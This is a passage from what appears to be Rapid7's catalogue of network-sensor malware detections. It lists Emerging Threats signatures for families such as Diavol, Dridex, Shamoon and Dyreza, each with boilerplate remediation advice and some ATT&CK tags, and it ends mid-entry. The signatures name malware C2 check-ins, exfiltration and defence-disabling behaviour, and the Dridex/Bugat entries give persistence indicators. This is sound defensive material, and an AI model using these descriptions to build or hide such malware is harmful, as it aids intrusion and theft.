This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DEEP PANDA Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Delf Checkin via HTTP (5)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Delphi Trojan Downloader User-Agent (JEDI-VCL)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dialer-715 Install Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dialer.MC(vf) HTTP Request - Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dialer.Trojan Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DiamondFox HTTP Post CnC Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Ext Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Ignore Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Key Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Landing Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Priority Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Register M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Register M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Services Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Diavol Communicating with CnC - Wipe Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DirectsX CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DirtJumper Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DistTrack/Shamoon CnC Beacon M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DistTrack/Shamoon CnC Beacon M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE DLoader File Download Request Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DMSpammer HTTP Post Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSpionage Commands Embedded in Webpage Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSpionage Requesting Config

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSTrojan FakeAV Dropper Activity Observed (1)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DNSTrojan FakeAV Dropper Activity Observed (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Domen SocEng Redirect - Landing Page Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonBot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Donkeyp2p Update Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Donot (APT-C-35) Stage 1 Requesting Main Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Donot (APT-C-35) Stage 1 Requesting Persistence Setup File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Pult Downloader Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DonotGroup Template Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dooptroop CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dooptroop Dropper Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dorkbot GeoIP Lookup to wipmania

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dorkbot Loader Payload Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dosenjo/Kvadr Proxy Trojan Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downadup/Conficker A or B Worm reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downeks Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downeks Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Downloaded .bat Disables Real Time Monitoring

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloaded .bat Disables Windows Defender

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloaded Script Disables Firewall/Antivirus

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader-5265/Torpig/Anserin/Sinowal Unique UA (MSID)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Banload2.KZU Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Banload2.KZU Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DownloaderExchanger/Cbeplay Variant Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader General Bot Checking In via HTTP Post (bot_id push)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader (P2P Zeus dropper UA)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.VB.TX/Backdoor.Win32.DSSdoor!IK Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Adload (KaiXin Payload) Config Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Banload Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Geral Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader Win32.Small.agoy Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Downloader.Win32.Small CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dragonfly Backdoor.Goodor Go Implant CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dridex Base64 Executable

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex/Bugat/Feodo GET Checkin

Description
Copy link

Bugat, which is also called ‘Cridex’ or ‘Feodo’, is a Trojan designed to intercept information entered by a user on specific websites. This Trojan is commonly used to steal credit card information or credentials for banking websites.

Recommendation
Copy link

Bugat writes an executable file to disk in the user’s Application Data directory. The standard naming convention for these executable files is a string of eight hexadecimal characters, or the prefix ‘kb’ followed by a string of digits.

Examples: C:\Users<username>\Application Data\kb208351.exe C:\Users<username>\Application Data\3a83cd09.exe

Bugat will create a registry Run key that will start an executable upon login.

When performing investigations, executable files matching the location and naming convention, and any suspicious registry keys in HKCU\Software\Microsoft\Windows\CurrentVersion\Run should be checked, validated, and removed.

ET MALWARE Dridex/Bugat/Feodo POST Checkin

Description
Copy link

Bugat, which is also called ‘Cridex’ or ‘Feodo’, is a Trojan designed to intercept information entered by a user on specific websites. This Trojan is commonly used to steal credit card information or credentials for banking websites.

Recommendation
Copy link

Bugat writes an executable file to disk in the user’s Application Data directory. The standard naming convention for these executable files is a string of eight hexadecimal characters, or the prefix ‘kb’ followed by a string of digits.

Examples: C:\Users<username>\Application Data\kb208351.exe C:\Users<username>\Application Data\3a83cd09.exe

Bugat will create a registry Run key that will start an executable upon login.

When performing investigations, executable files matching the location and naming convention, and any suspicious registry keys in HKCU\Software\Microsoft\Windows\CurrentVersion\Run should be checked, validated, and removed.

ET MALWARE Dridex CnC Request - Spam/Worm Component

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex CnC Request - Spam/Worm Component

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex DL Pattern Feb 18 2016

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex POST Checkin

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex Post Check-in Activity

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex POST Retrieving Second Stage

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Dridex v2 POST Checkin

Description
Copy link

Dridex is a modular banking Trojan that borrows code from the Trojan ‘Cridex’, which is also called ‘Bugat’. Dridex is delivered to systems via malspam campaigns using various phishing themes and document lure types. Dridex uses expiring loaders, leverages code injection, deploys web injects into a compromised asset’s browsers, and persists using scheduled tasks and DLL hijacking. Open Source Intelligence (OSINT) indicates that Dridex uses P2P networking for exfiltration, can move laterally, and has been used in conjunction with BitPaymer Ransomware.

Recommendation
Copy link

Restore systems impacted by Dridex to a known, good baseline image that has been validated by your organization, as persistence artifacts change frequently. Provide electronic social engineering user training, and advise users to not interact with attachments or URLs in suspicious emails.

ET MALWARE Driveby Exploit Attempt Often to Install Monkif

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Driveby Loader Request List.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Drop.Agent.bfsv HTTP Activity (UsER-AgENt)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Binary Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Binary Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Domain (ahgwqrq .xyz in TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DTLoader Encoded Binary - Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dumador Reporting User Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE DustySky CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Dyre CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Ex-filtrating Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Dyreza RAT Fake Server Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE eCh0raix/QNAPCrypt CnC Activity - Done

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE eCh0raix/QNAPCrypt CnC Activity - Started

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Echelon/DarkStealer Variant CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Echelon/DarkStealer Variant CnC Exfil M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Echelon/Mist Stealer CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ElectroRAT CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/AbcBot CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF/AbcBot Requesting Commands from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ELF_BASHLITE.SMB Dropping Files

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

